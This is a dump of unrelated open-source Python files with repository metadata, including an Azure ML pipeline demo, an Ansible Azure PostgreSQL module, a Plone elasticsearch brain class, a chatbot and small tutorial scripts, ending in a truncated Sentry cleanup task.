    #     does not iterate indices and values in parallel.
    #   * `V` is never populated, so `V[i]` would raise IndexError.
    #   * `nome` is undefined, and `novodic=nome[tempo]` rebinds the result
    #     dict instead of inserting into it.
    # The intended behaviour (presumably time = velocity / acceleration per
    # name) needs to be reconstructed before this can be fixed.
    novodic={}
    V=[]
    tempo=[]
    for i in range(len(dnomes_aceleração)) and a in dnomes_aceleração.values():
        tempo=(V[i])/a[i]
        novodic=nome[tempo]
    return novodic
"you@example.com"
] | you@example.com |
e0aec4b793d9baf3e77815a97b1a6fcda4f09d46 | 2ce27b05f45cef6ce3ae5c02b8e83e548def2fc6 | /ADVANCE/Modules/Renaming the module.py | 3ec25656a999a01846ceee8a874dac28e2766867 | [] | no_license | Ajay2521/Python | 775b7d99736e83e4d0c37302b91d1413dd2c0d3b | a426dd7717de8a5e60e584d208ae7120bb84c1b3 | refs/heads/master | 2022-12-01T17:49:12.672061 | 2020-08-15T14:55:12 | 2020-08-15T14:55:12 | 273,632,074 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 848 | py | # lets see about "Renaming a Modules" in python.
# It is possible to import the module by using specific user defined name called as "alias name".
# It is posssibile to access the functionality of the module by using its "alias name" which was declared while importing the module.
# Syntax for renaming a module is:
# import moduleName as aliasName
# Here is the program which is used to import module "Calculate.py" by using an alias name.
import Calculate as Cal
# Getting user input for variables a and b.
a = int( input ( "\nEnter a value for \"a\" : " ) )
b = int( input ( "\nEnter a value for \"b\" : " ) )
# Accessing the functionality present in the module "Calculate" using alias name by using dot( . ) operator.
Cal.Add( a, b)
Cal.Multi( a,b )
print( ) # Used to print new line for readability. | [
"noreply@github.com"
] | Ajay2521.noreply@github.com |
96a80deed9c0cdafbb52abf608c43ee8b5a7308a | cf4c9b102ab3a2720a045ad0b4c0b1d610738102 | /shrike-examples/pipelines/experiments/demo_chain_components.py | a82c9bfd1775806779047e1a23422ef47d93bb33 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | isabella232/azure-ml-problem-sets | a7c0b0070b08598e5f473c91e47cad1fc3525a9b | 5e6a3227032e51bb224a1085dc4f9ee9f8bd1dcf | refs/heads/main | 2023-07-12T11:49:58.465710 | 2021-08-12T17:02:11 | 2021-08-12T17:02:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,297 | py | """
The Azure ML pipeline that demonstrates how to chain components together.
to execute:
> python pipelines/experiments/demo_chain_components.py --config-dir pipelines/config --config-name experiments/demo_chain_components run.submit=True
"""
# pylint: disable=no-member
# NOTE: because it raises 'dict' has no 'outputs' member in dsl.pipeline construction
import os
import sys
from dataclasses import dataclass
from typing import Optional
from azure.ml.component import dsl
from shrike.pipeline.pipeline_helper import AMLPipelineHelper
# NOTE: if you need to import from pipelines.*
ACCELERATOR_ROOT_PATH = os.path.abspath(
os.path.join(os.path.dirname(__file__), "..", "..")
)
if ACCELERATOR_ROOT_PATH not in sys.path:
print(f"Adding to path: {ACCELERATOR_ROOT_PATH}")
sys.path.append(str(ACCELERATOR_ROOT_PATH))
class ChainComponentsDemo(AMLPipelineHelper):
    """Runnable/reusable pipeline helper class

    This class inherits from AMLPipelineHelper which provides
    helper functions to create reusable production pipelines.
    """

    def build(self, config):
        """Builds a pipeline function for this pipeline using AzureML SDK (dsl.pipeline).

        This method returns a constructed pipeline function (decorated with @dsl.pipeline).

        Args:
            config (DictConfig): configuration object

        Returns:
            dsl.pipeline: the function to create your pipeline
        """
        # helper functions below load the subgraph/component from registered or local version depending on your config.run.use_local
        probe_component = self.component_load("probe")

        # Here you should create an instance of a pipeline function (using your custom config dataclass)
        @dsl.pipeline(
            name="demo-chain-components",
            description="The Azure ML demo of a graph where components are chained, i.e. the input of a component is the output of an upstream component.",
            default_datastore=config.compute.compliant_datastore,
        )
        def demo_pipeline_function(probe_dataset):
            """Pipeline function for this graph.

            Args:
                probe_dataset (FileDataset): input dataset (usually obtained through extraction from Heron portal)

            Returns:
                dict[str->PipelineOutputData]: a dictionary of your pipeline outputs
                    for instance to be consumed by other graphs
            """
            # general syntax:
            # module_instance = module_class(input=data, param=value)
            # or
            # subgraph_instance = subgraph_function(input=data, param=value)
            probe_component_step_1 = probe_component(
                input_data=probe_dataset,
                scan_args=config.probe1.scan_args,
                scan_deps=config.probe1.scan_deps,
                scan_input=config.probe1.scan_input,
                scan_env=config.probe1.scan_env,
                verbose=config.probe1.verbose,
            )
            self.apply_recommended_runsettings(
                "probe", probe_component_step_1, gpu=True
            )

            probe_component_step_2 = probe_component(
                # BUGFIX: this input was left as an unassigned "To-Do"
                # placeholder, which made the file a SyntaxError. Chaining
                # means step 2 consumes step 1's output dataset.
                input_data=probe_component_step_1.outputs.results,
                scan_args=config.probe2.scan_args,
                scan_deps=config.probe2.scan_deps,
                scan_input=config.probe2.scan_input,
                scan_env=config.probe2.scan_env,  # here we're using a different parameter
                verbose=config.probe2.verbose,
            )
            self.apply_recommended_runsettings(
                "probe", probe_component_step_2, gpu=True
            )

            # return {key: output}
            return {"subgraph_results": probe_component_step_2.outputs.results}

        # finally return the function itself to be built by helper code
        return demo_pipeline_function

    def pipeline_instance(self, pipeline_function, config):
        """Given a pipeline function, creates a runnable instance based on provided config.

        This is used only when calling this as a runnable pipeline using .main() function (see below).
        The goal of this function is to map the config to the pipeline_function inputs and params.

        Args:
            pipeline_function (function): the pipeline function obtained from self.build()
            config (DictConfig): configuration object

        Returns:
            azureml.core.Pipeline: the instance constructed with its inputs and params.
        """
        # NOTE: self.dataset_load() helps to load the dataset based on its name and version
        pipeline_input_dataset = self.dataset_load(
            name=config.inputs.input_data,
            version=config.inputs.input_data_version,
        )

        # when all inputs are obtained, we call the pipeline function
        probe_pipeline = pipeline_function(probe_dataset=pipeline_input_dataset)

        # and we return that function so that helper can run it.
        return probe_pipeline
# NOTE: main block is necessary only if script is intended to be run from command line
if __name__ == "__main__":
# calling the helper .main() function
ChainComponentsDemo.main()
# comment to bypass caching
| [
"noreply@github.com"
] | isabella232.noreply@github.com |
bdd46ea024647f32161f4a683728f074d4063515 | 3ec3de2e1bdfe2890084f15ac4b0f0714aeff096 | /collective/elasticsearch/brain.py | 96b5288c5a80a83427d9c29de053589df5f03708 | [] | no_license | eea/collective.elasticsearch | 7d6afc0b5f66810ab7b3a6b8aa1835a187a07f7e | baaaa73245b4866936383b001f0dda17ad991846 | refs/heads/master | 2023-08-01T03:34:51.375866 | 2013-06-06T15:42:01 | 2013-06-06T15:42:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,008 | py | from Acquisition import Implicit, aq_get
from Products.ZCatalog.interfaces import ICatalogBrain
from zope.interface import implements
from zope.globalrequest import getRequest
from Products.CMFPlone.utils import pretty_title_or_id
from collective.elasticsearch.ejson import loads
_marker = []
class Brain(Implicit):
    """
    A special brain implementation that uses the results
    from elasticsearch to load the brain.
    """
    implements(ICatalogBrain)
    __allow_access_to_unprotected_subobjects__ = True

    def __init__(self, data, catalog):
        # `data` is one elasticsearch hit; its '_metadata' field holds the
        # JSON-serialized catalog metadata, decoded lazily via `self.data`.
        self._idata = data
        self._raw_data = self._idata['_metadata']
        self._data = None
        self._catalog = catalog

    @property
    def data(self):
        # Decode the raw metadata once and cache the result.
        if self._data is None:
            self._data = loads(self._raw_data)
        return self._data

    def has_key(self, key):
        return key in self.data
    __contains__ = has_key

    @property
    def pretty_title_or_id(self):
        return pretty_title_or_id(self._catalog, self)

    def __getattr__(self, name, default=_marker):
        # Resolution order: REQUEST -> private attrs in __dict__ ->
        # metadata keys -> portal_* tools acquired from the catalog.
        # NOTE(review): a name matching none of these falls off the end and
        # yields None instead of raising AttributeError.
        if name == 'REQUEST':
            request = aq_get(self._catalog, 'REQUEST', None)
            if request is None:
                request = getRequest()
            return request
        elif name[0] == '_':
            try:
                return self.__dict__[name]
            except KeyError:
                if default == _marker:
                    raise AttributeError(name)
                else:
                    return default
        if name in self.data:
            return self.data[name]
        elif name.startswith('portal_'):
            # XXX really ugly...
            return aq_get(self._catalog, name)

    def getPath(self):
        return '/'.join(self.getRawPath())

    def getRawPath(self):
        # Returns the physical path as a tuple of str; () when '_path'
        # is missing from the metadata.
        try:
            # need to convert to string because we get
            # unicode from elastic
            path = self.data['_path']
            newpath = []
            for part in path:
                newpath.append(str(part))
            return tuple(newpath)
        except KeyError:
            return ()

    def getURL(self, relative=0):
        request = aq_get(self._catalog, 'REQUEST', None)
        if request is None:
            request = getRequest()
        return request.physicalPathToURL(self.getPath(), relative)

    def _unrestrictedGetObject(self):
        # Traverse without security checks.
        return self._catalog.unrestrictedTraverse(self.getPath())

    def getObject(self, REQUEST=None):
        # Traverse to the parent unrestricted, then do a security-checked
        # traverse for the final path element.
        path = self.getRawPath()
        if not path:
            return None
        if len(path) > 1:
            parent = self._catalog.unrestrictedTraverse(path[:-1])
        else:
            return ''
        return parent.restrictedTraverse(path[-1])

    def getRID(self):
        """Return the record ID for this object."""
        return self.data.get_id()
def BrainFactory(catalog):
    """Return a factory that turns one elasticsearch hit into a catalog-wrapped Brain."""
    def factory(result):
        brain = Brain(result, catalog)
        # __of__ places the brain in the catalog's acquisition context so
        # aq_get lookups in Brain work.
        return brain.__of__(catalog)
    return factory
| [
"vangheem@gmail.com"
] | vangheem@gmail.com |
95782f795681aa0df4a8250fe3ef599924447b85 | 9c7958f4c55d33d8bb0175600f169c060aa11f6f | /scripts/motifplot.py | ad3e8622dea75d1e259bb09292c37938b7b13e2b | [] | no_license | knutdrand/snakemakes | a245de79119dc0dc982f85e846149e3754ef64a9 | 9dd2355271d3da8d4767f7dac877f65f62d1aa9b | refs/heads/master | 2021-03-29T07:52:44.110983 | 2020-10-09T13:27:45 | 2020-10-09T13:27:45 | 247,933,836 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import numpy as np
# "col0:col1-col2" name built from whitespace-split fields (presumably
# chrom:start-end for a genomic interval — TODO confirm against inputs).
get_name = lambda parts: f"{parts[0]}:{parts[1]}-{parts[2]}"

# Names reported in column 3 of the tab-separated first input, skipping
# comment ('#') and blank lines.
matches = {line.split("\t")[2] for line in open(snakemake.input[0]) if not line.startswith("#") and line.strip()}
# For each region in the second input (in file order): is it in `matches`?
hits = [get_name(line.split()) in matches for line in open(snakemake.input[1])]
# Running fraction of matching regions among the first k entries.
ratio = np.cumsum(hits)/np.arange(1, len(hits)+1)
plt.plot(ratio)
plt.savefig(snakemake.output[0])
| [
"knutdrand@gmail.com"
] | knutdrand@gmail.com |
18632c639d4fef98ebd9a9968a695fcee2060ef2 | 64bf39b96a014b5d3f69b3311430185c64a7ff0e | /intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/azure/azcollection/plugins/modules/azure_rm_postgresqlconfiguration.py | 0fb4da64c8f89a0b4fe91409820956533bfbbb59 | [
"GPL-1.0-or-later",
"GPL-3.0-only",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | SimonFangCisco/dne-dna-code | 7072eba7da0389e37507b7a2aa5f7d0c0735a220 | 2ea7d4f00212f502bc684ac257371ada73da1ca9 | refs/heads/master | 2023-03-10T23:10:31.392558 | 2021-02-25T15:04:36 | 2021-02-25T15:04:36 | 342,274,373 | 0 | 0 | MIT | 2021-02-25T14:39:22 | 2021-02-25T14:39:22 | null | UTF-8 | Python | false | false | 8,121 | py | #!/usr/bin/python
#
# Copyright (c) 2019 Zim Kalinowski, (@zikalino)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_postgresqlconfiguration
version_added: "0.1.2"
short_description: Manage Azure PostgreSQL Configuration
description:
- Update or reset Azure PostgreSQL Configuration setting.
options:
resource_group:
description:
- The name of the resource group that contains the resource.
required: True
server_name:
description:
- The name of the server.
required: True
name:
description:
- Setting name.
required: True
value:
description:
- Setting value.
state:
description:
- Assert the state of the PostgreSQL setting. Use C(present) to update setting, or C(absent) to reset to default value.
default: present
choices:
- absent
- present
extends_documentation_fragment:
- azure.azcollection.azure
author:
- Zim Kalinowski (@zikalino)
'''
EXAMPLES = '''
- name: Update PostgreSQL Server setting
azure_rm_postgresqlconfiguration:
resource_group: myResourceGroup
server_name: myServer
name: deadlock_timeout
value: 2000
'''
RETURN = '''
id:
description:
- Resource ID.
returned: always
type: str
sample: "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/Microsoft.DBforPostgreSQL/servers/myServer/confi
gurations/event_scheduler"
'''
import time
try:
from ansible_collections.azure.azcollection.plugins.module_utils.azure_rm_common import AzureRMModuleBase
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller
from azure.mgmt.rdbms.postgresql import MySQLManagementClient
from msrest.serialization import Model
except ImportError:
# This is handled in azure_rm_common
pass
class Actions:
NoAction, Create, Update, Delete = range(4)
class AzureRMPostgreSqlConfigurations(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
resource_group=dict(
type='str',
required=True
),
server_name=dict(
type='str',
required=True
),
name=dict(
type='str',
required=True
),
value=dict(
type='str'
),
state=dict(
type='str',
default='present',
choices=['present', 'absent']
)
)
self.resource_group = None
self.server_name = None
self.name = None
self.value = None
self.results = dict(changed=False)
self.state = None
self.to_do = Actions.NoAction
super(AzureRMPostgreSqlConfigurations, self).__init__(derived_arg_spec=self.module_arg_spec,
supports_check_mode=True,
supports_tags=False)
def exec_module(self, **kwargs):
for key in list(self.module_arg_spec.keys()):
if hasattr(self, key):
setattr(self, key, kwargs[key])
old_response = None
response = None
old_response = self.get_configuration()
if not old_response:
self.log("Configuration instance doesn't exist")
if self.state == 'absent':
self.log("Old instance didn't exist")
else:
self.to_do = Actions.Create
else:
self.log("Configuration instance already exists")
if self.state == 'absent' and old_response['source'] == 'user-override':
self.to_do = Actions.Delete
elif self.state == 'present':
self.log("Need to check if Configuration instance has to be deleted or may be updated")
if self.value != old_response.get('value'):
self.to_do = Actions.Update
if (self.to_do == Actions.Create) or (self.to_do == Actions.Update):
self.log("Need to Create / Update the Configuration instance")
if self.check_mode:
self.results['changed'] = True
return self.results
response = self.create_update_configuration()
self.results['changed'] = True
self.log("Creation / Update done")
elif self.to_do == Actions.Delete:
self.log("Configuration instance deleted")
self.results['changed'] = True
if self.check_mode:
return self.results
self.delete_configuration()
else:
self.log("Configuration instance unchanged")
self.results['changed'] = False
response = old_response
if response:
self.results["id"] = response["id"]
return self.results
def create_update_configuration(self):
self.log("Creating / Updating the Configuration instance {0}".format(self.name))
try:
response = self.postgresql_client.configurations.create_or_update(resource_group_name=self.resource_group,
server_name=self.server_name,
configuration_name=self.name,
value=self.value,
source='user-override')
if isinstance(response, LROPoller):
response = self.get_poller_result(response)
except CloudError as exc:
self.log('Error attempting to create the Configuration instance.')
self.fail("Error creating the Configuration instance: {0}".format(str(exc)))
return response.as_dict()
def delete_configuration(self):
self.log("Deleting the Configuration instance {0}".format(self.name))
try:
response = self.postgresql_client.configurations.create_or_update(resource_group_name=self.resource_group,
server_name=self.server_name,
configuration_name=self.name,
source='system-default')
except CloudError as e:
self.log('Error attempting to delete the Configuration instance.')
self.fail("Error deleting the Configuration instance: {0}".format(str(e)))
return True
def get_configuration(self):
self.log("Checking if the Configuration instance {0} is present".format(self.name))
found = False
try:
response = self.postgresql_client.configurations.get(resource_group_name=self.resource_group,
server_name=self.server_name,
configuration_name=self.name)
found = True
self.log("Response : {0}".format(response))
self.log("Configuration instance : {0} found".format(response.name))
except CloudError as e:
self.log('Did not find the Configuration instance.')
if found is True:
return response.as_dict()
return False
def main():
"""Main execution"""
AzureRMPostgreSqlConfigurations()
if __name__ == '__main__':
main()
| [
"sifang@cisco.com"
] | sifang@cisco.com |
75e77756f7e98beff12a713496ae5b97436d939e | 4f6e4fdc31396ee5ca8995d796af0365d0976934 | /scripts/collect_manifest.py | 91955f9409e83ceb223aa2225c1a34e317e45502 | [] | no_license | dannguyen/quickdataproject-template | ea84426629cb5aa3b3be9adc089b9e8c290c32cb | 8f598b3abd9f23b39bf26a807d217f165fb03289 | refs/heads/master | 2022-11-29T05:29:22.383439 | 2020-08-06T00:07:06 | 2020-08-06T00:07:06 | 282,715,134 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,431 | py | #!/usr/bin/env python
"""
autocollect_manifest.py
Reads data/MANIFEST.yaml, and for each entry where autocollect==true, downloads from the
corresponding `url`
"""
from sys import path as syspath; syspath.append('./scripts')
from utils.myfetch import download, existed_size
from utils.mylog import mylog
from pathlib import Path
import requests
import yaml
MANIFEST_PATH = Path('./data/DATA_MANIFEST.yaml')
def collect_manifest():
"""
returns list of tuples, with file filepath and source url
filtered for data/collected prefixes
"""
mani = yaml.load(MANIFEST_PATH.open(), Loader=yaml.BaseLoader)
return [(filepath, v['url']) for filepath, v in mani.items() if v.get('autocollect') == 'true']
def main():
target_dir = MANIFEST_PATH.parent
for filename, url in collect_manifest():
target_path = target_dir.joinpath(filename)
_bx = existed_size(target_path)
if _bx:
mylog(f"{target_path} already exists, with {_bx} bytes", label='Skipping')
else:
mylog(url, label='Fetching')
content = download(url)
target_path.parent.mkdir(exist_ok=True, parents=True)
with open(target_path, 'wb') as target:
for cx in content:
target.write(cx)
mylog(f"{existed_size(target_path)} bytes to {target_path}", label='Wrote')
if __name__ == '__main__':
main()
| [
"dansonguyen@gmail.com"
] | dansonguyen@gmail.com |
caad16e683e5fb3ded0072a758ed1fe6f5324386 | 9e2943857c3b5b46b4fea59f0e9a46aae54e17a8 | /nautobot_golden_config/template_content.py | 3462a238d115e16e9ed5aa778004d862ee60b025 | [
"Apache-2.0"
] | permissive | danisoltani/nautobot-plugin-golden-config | 883e40ef313c29d3d5197b7f17ca68e76e7bad95 | f285af4bdc6340ae7276c372d3e85a0021c078ed | refs/heads/develop | 2023-05-05T18:51:47.439841 | 2021-04-28T04:28:48 | 2021-04-28T04:28:48 | 363,667,445 | 0 | 0 | NOASSERTION | 2021-05-02T14:56:00 | 2021-05-02T14:14:22 | null | UTF-8 | Python | false | false | 3,317 | py | """Added content to the device model view for config compliance."""
from django.db.models import Count, Q
from nautobot.extras.plugins import PluginTemplateExtension
from .models import ConfigCompliance, GoldenConfiguration
from .utilities.constant import ENABLE_COMPLIANCE, CONFIG_FEATURES
from .utilities.helper import get_allowed_os_from_nested
class ConfigComplianceDeviceCheck(PluginTemplateExtension): # pylint: disable=abstract-method
"""Plugin extension class for config compliance."""
model = "dcim.device"
def get_device(self):
"""Get device object."""
return self.context["object"]
def right_page(self):
"""Content to add to the configuration compliance."""
comp_obj = (
ConfigCompliance.objects.filter(**get_allowed_os_from_nested())
.filter(device=self.get_device())
.values("feature", "compliance")
)
extra_context = {
"compliance": comp_obj,
"device": self.get_device(),
"template_type": "device-compliance",
}
return self.render(
"nautobot_golden_config/content_template.html",
extra_context=extra_context,
)
class ConfigComplianceSiteCheck(PluginTemplateExtension): # pylint: disable=abstract-method
"""Plugin extension class for config compliance."""
model = "dcim.site"
def get_site_slug(self):
"""Get site object."""
return self.context["object"]
def right_page(self):
"""Content to add to the configuration compliance."""
comp_obj = (
ConfigCompliance.objects.values("feature")
.filter(**get_allowed_os_from_nested())
.filter(device__site__slug=self.get_site_slug().slug)
.annotate(
compliant=Count("feature", filter=Q(compliance=True)),
non_compliant=Count("feature", filter=~Q(compliance=True)),
)
.values("feature", "compliant", "non_compliant")
)
extra_context = {"compliance": comp_obj, "template_type": "site"}
return self.render(
"nautobot_golden_config/content_template.html",
extra_context=extra_context,
)
class ConfigDeviceDetails(PluginTemplateExtension): # pylint: disable=abstract-method
"""Plugin extension class for config compliance."""
model = "dcim.device"
def get_device(self):
"""Get device object."""
return self.context["object"]
def right_page(self):
"""Content to add to the configuration compliance."""
golden_config = (
GoldenConfiguration.objects.filter(**get_allowed_os_from_nested()).filter(device=self.get_device()).first()
)
extra_context = {
"device": self.get_device(), # device,
"golden_config": golden_config,
"template_type": "device-configs",
"config_features": CONFIG_FEATURES,
}
return self.render(
"nautobot_golden_config/content_template.html",
extra_context=extra_context,
)
extensions = [ConfigDeviceDetails]
if ENABLE_COMPLIANCE:
extensions.append(ConfigComplianceDeviceCheck)
extensions.append(ConfigComplianceSiteCheck)
template_extensions = extensions
| [
"ken@celenza.org"
] | ken@celenza.org |
49eb833b90b654ddd54f089d23f66718dd3cdf2b | 15085c0dfc7f596fc03e2d69e9775860d5aece2b | /echo/main.py | 6626d60850553bdbdc47c0dded10c03dad4bc93a | [
"MIT"
] | permissive | botstory/echo-bot | 1fb56d48236d34b0a3f3f74cee0478a1df7b0414 | 9758fb5baf0fe033a2e29a8fb092e5a40ea70a0b | refs/heads/develop | 2021-09-08T02:26:44.739492 | 2016-12-21T23:37:29 | 2016-12-21T23:37:29 | 71,016,543 | 0 | 0 | MIT | 2018-03-06T01:05:28 | 2016-10-15T22:18:12 | Python | UTF-8 | Python | false | false | 4,719 | py | #!/usr/bin/env python
import asyncio
from aiohttp_index import IndexMiddleware
from botstory import chat, story
from botstory.integrations import aiohttp, fb, mongodb
from botstory.integrations.ga import tracker
from botstory.middlewares import any, text
import logging
import os
import pathlib
logger = logging.getLogger('echo-bot')
logger.setLevel(logging.DEBUG)
PROJ_ROOT = pathlib.Path(__file__).parent
# define stories
@story.on_start()
def on_start():
"""
User just pressed `get started` button so we can greet him
"""
@story.part()
async def greetings(message):
await chat.say('Hi There! Nice to see you! ', message['user'])
await chat.say('I''m very simple bot that show basic features of '
'https://github.com/botstory/botstory '
'open source platform.', message['user'])
await chat.say('You can send me any text message and '
'I will echo it back to you.', message['user'])
await chat.say('Any other messages will just bounce '
'with trivial answer '
'that I don''t know what is it.', message['user'])
await chat.say('You can find my source here '
'https://github.com/botstory/echo-bot.', message['user'])
await chat.say('Lets make the best bot together!', message['user'])
@story.on(receive=text.Any())
def echo_story():
"""
React on any text message
"""
@story.part()
async def echo(message):
await chat.say('Hi! I just got something from you:', message['user'])
await chat.say('> {}'.format(message['data']['text']['raw']), message['user'])
@story.on(receive=any.Any())
def else_story():
"""
And all the rest messages as well
"""
@story.part()
async def something_else(message):
await chat.say('Hm I don''t know what is it', message['user'])
# setup modules
def init(auto_start=True, fake_http_session=None):
# Interface for communication with FB
story.use(fb.FBInterface(
# will show on initial screen
greeting_text='Hello dear {{user_first_name}}! '
'I'' m demo bot of BotStory framework.',
# you should get on admin panel for the Messenger Product in Token Generation section
page_access_token=os.environ.get('FB_ACCESS_TOKEN', 'TEST_TOKEN'),
# menu of the bot that user has access all the time
persistent_menu=[{
'type': 'postback',
'title': 'Monkey Business',
'payload': 'MONKEY_BUSINESS'
}, {
'type': 'web_url',
'title': 'Source Code',
'url': 'https://github.com/botstory/bot-story/'
}],
# should be the same as in admin panel for the Webhook Product
webhook_url='/webhook{}'.format(os.environ.get('FB_WEBHOOK_URL_SECRET_PART', '')),
webhook_token=os.environ.get('FB_WEBHOOK_TOKEN', None),
))
# Interface for HTTP
http = story.use(aiohttp.AioHttpInterface(
port=os.environ.get('API_PORT', 8080),
auto_start=auto_start,
middlewares=[IndexMiddleware()],
))
# User and Session storage
story.use(mongodb.MongodbInterface(
uri=os.environ.get('MONGODB_URI', 'mongo'),
db_name=os.environ.get('MONGODB_DB_NAME', 'echobot'),
))
story.use(tracker.GAStatistics(
tracking_id=os.environ.get('GA_ID'),
))
# for test purpose
http.session = fake_http_session
return http
async def setup(fake_http_session=None):
logger.info('setup')
init(auto_start=False, fake_http_session=fake_http_session)
await story.setup()
async def start(auto_start=True, fake_http_session=None):
http = init(auto_start, fake_http_session)
logger.debug('static {}'.format(str(PROJ_ROOT.parent / 'static')))
http.app.router.add_static('/',
path=str(PROJ_ROOT.parent / 'static'),
name='static',
)
# start bot
await story.start()
logger.info('started')
return http.app
async def stop():
await story.stop()
# TODO: should be something like
# story.clear()
story.middlewares = []
# launch app
def main(forever=True):
logging.basicConfig(level=logging.DEBUG)
loop = asyncio.get_event_loop()
app = loop.run_until_complete(start(auto_start=forever))
# and run forever
if forever:
story.forever(loop)
# or you can use gunicorn for an app of http interface
return app
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(setup())
| [
"ievgenii.krevenets@gmail.com"
] | ievgenii.krevenets@gmail.com |
b85989f44c0c5678aef5406bd0f266f81c9b6801 | 930c207e245c320b108e9699bbbb036260a36d6a | /BRICK-RDFAlchemy/generatedCode/brick/brickschema/org/schema/_1_0_2/Brick/Run_Request.py | 21243df3b2d7a7e6c9c7e61be74114b96e4b7e6b | [] | no_license | InnovationSE/BRICK-Generated-By-OLGA | 24d278f543471e1ce622f5f45d9e305790181fff | 7874dfa450a8a2b6a6f9927c0f91f9c7d2abd4d2 | refs/heads/master | 2021-07-01T14:13:11.302860 | 2017-09-21T12:44:17 | 2017-09-21T12:44:17 | 104,251,784 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 335 | py | from rdflib import Namespace, Graph, Literal, RDF, URIRef
from rdfalchemy.rdfSubject import rdfSubject
from rdfalchemy import rdfSingle, rdfMultiple, rdfList
from brick.brickschema.org.schema._1_0_2.Brick.Run import Run
class Run_Request(Run):
rdf_type = Namespace('https://brickschema.org/schema/1.0.2/Brick#').Run_Request
| [
"Andre.Ponnouradjane@non.schneider-electric.com"
] | Andre.Ponnouradjane@non.schneider-electric.com |
8bf0c04b439cb5dfdf1f0c9dd08741647b06b7d5 | bb2c530d891a95a5e93668ac3aa3bf71472c5909 | /PracticeWithFunctionsTestCases/test_hypotenuse.py | ba3e25b9c46b6ab1142dcb1a32b2720b4a9a8c38 | [] | no_license | http403/CS121 | 3e069805e53f2cda19427100225c3c4103f24f48 | 210fbd2d47fcdd63b7cb4c7b9ab1c9ef08c24b7a | refs/heads/master | 2023-03-06T06:41:33.546807 | 2020-03-09T21:09:08 | 2020-03-09T21:09:08 | 235,925,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | # YOU CAN IGNORE THIS FILE ENTIRELY
from unittest import TestCase
from functions import hypotenuse
class TestHypotenuse(TestCase):
def test_hypotenuse(self):
self.assertAlmostEqual(
hypotenuse(4, 5), 6.4, places=1
)
| [
"unconfigured@null.spigotmc.org"
] | unconfigured@null.spigotmc.org |
b04db0deba781b2b43f22047366123ba61eb2819 | 225895b88bbfdf2194ef3df86fd590c2556275f9 | /intellij-community/system/python_stubs/-1247972723/lxml/etree/ParserBasedElementClassLookup.py | 14e340f8b39fbf83837af08103f1c6733efd9e9c | [
"Apache-2.0"
] | permissive | novokrest/JBIDEA | 228d65681fbdb6b3534f7d18bcc944a5eafe6687 | f43706f22a5d33e6d39c1c72ef4fdeee9e4472f6 | refs/heads/master | 2021-01-19T14:06:48.645122 | 2014-07-29T17:42:31 | 2014-07-29T17:42:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 897 | py | # encoding: utf-8
# module lxml.etree
# from /usr/lib/python2.7/dist-packages/lxml/etree.so
# by generator 1.135
"""
The ``lxml.etree`` module implements the extended ElementTree API
for XML.
"""
# imports
import __builtin__ as __builtins__ # <module '__builtin__' (built-in)>
from FallbackElementClassLookup import FallbackElementClassLookup
class ParserBasedElementClassLookup(FallbackElementClassLookup):
"""
ParserBasedElementClassLookup(self, fallback=None)
Element class lookup based on the XML parser.
"""
def __init__(self, fallback=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
__pyx_vtable__ = None # (!) real value is ''
| [
"novokrest013@gmail.com"
] | novokrest013@gmail.com |
7280af97c7a87ba80760065fd332fdb17a84c1c4 | 46c8c0e435877f4564970198e8a177e9883103e9 | /520_Detect_Capital/detect_capital.py | f6a91cea73bf33840604cee3eaf92c5bb44abb5d | [] | no_license | Brady31027/leetcode | 26f7c1f4e8bfad0dee4d819f91aa93a241223330 | d66be3a8f002875097754df6138c704e28b79810 | refs/heads/master | 2018-02-16T14:52:31.976844 | 2017-08-10T19:18:59 | 2017-08-10T19:18:59 | 63,519,661 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py | class Solution(object):
def detectCapitalUse(self, word):
"""
:type word: str
:rtype: bool
"""
if re.search("^[A-Z]*$", word): return True
elif re.search("^[A-Z]{0,1}[^A-Z]*$", word): return True
return False
| [
"brady31027@gmail.com"
] | brady31027@gmail.com |
c481440b942e4f0076b46190644bd2cf5f0c6f33 | 7f2b20782f785276b6b268a3a616223571f3b83c | /src/sentry/tasks/cleanup.py | 61610f9b6b36e1bae4f3d2db32314746810b437b | [
"BSD-2-Clause"
] | permissive | dz0ny/sentry | 9a26961cfbd4925c63b757072d52794900cebf89 | b216b726a618b9540724e0a880d4e816638e2326 | refs/heads/master | 2020-12-24T09:52:44.593824 | 2012-08-31T06:07:56 | 2012-08-31T06:07:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,802 | py | """
sentry.tasks.cleanup
~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from celery.task import task
@task(ignore_result=True)
def cleanup(days=30, logger=None, site=None, server=None, level=None,
project=None, resolved=None, **kwargs):
"""
Deletes a portion of the trailing data in Sentry based on
their creation dates. For example, if ``days`` is 30, this
would attempt to clean up all data thats older than 30 days.
:param logger: limit all deletion scopes to messages from the
specified logger.
:param site: limit the message deletion scope to the specified
site.
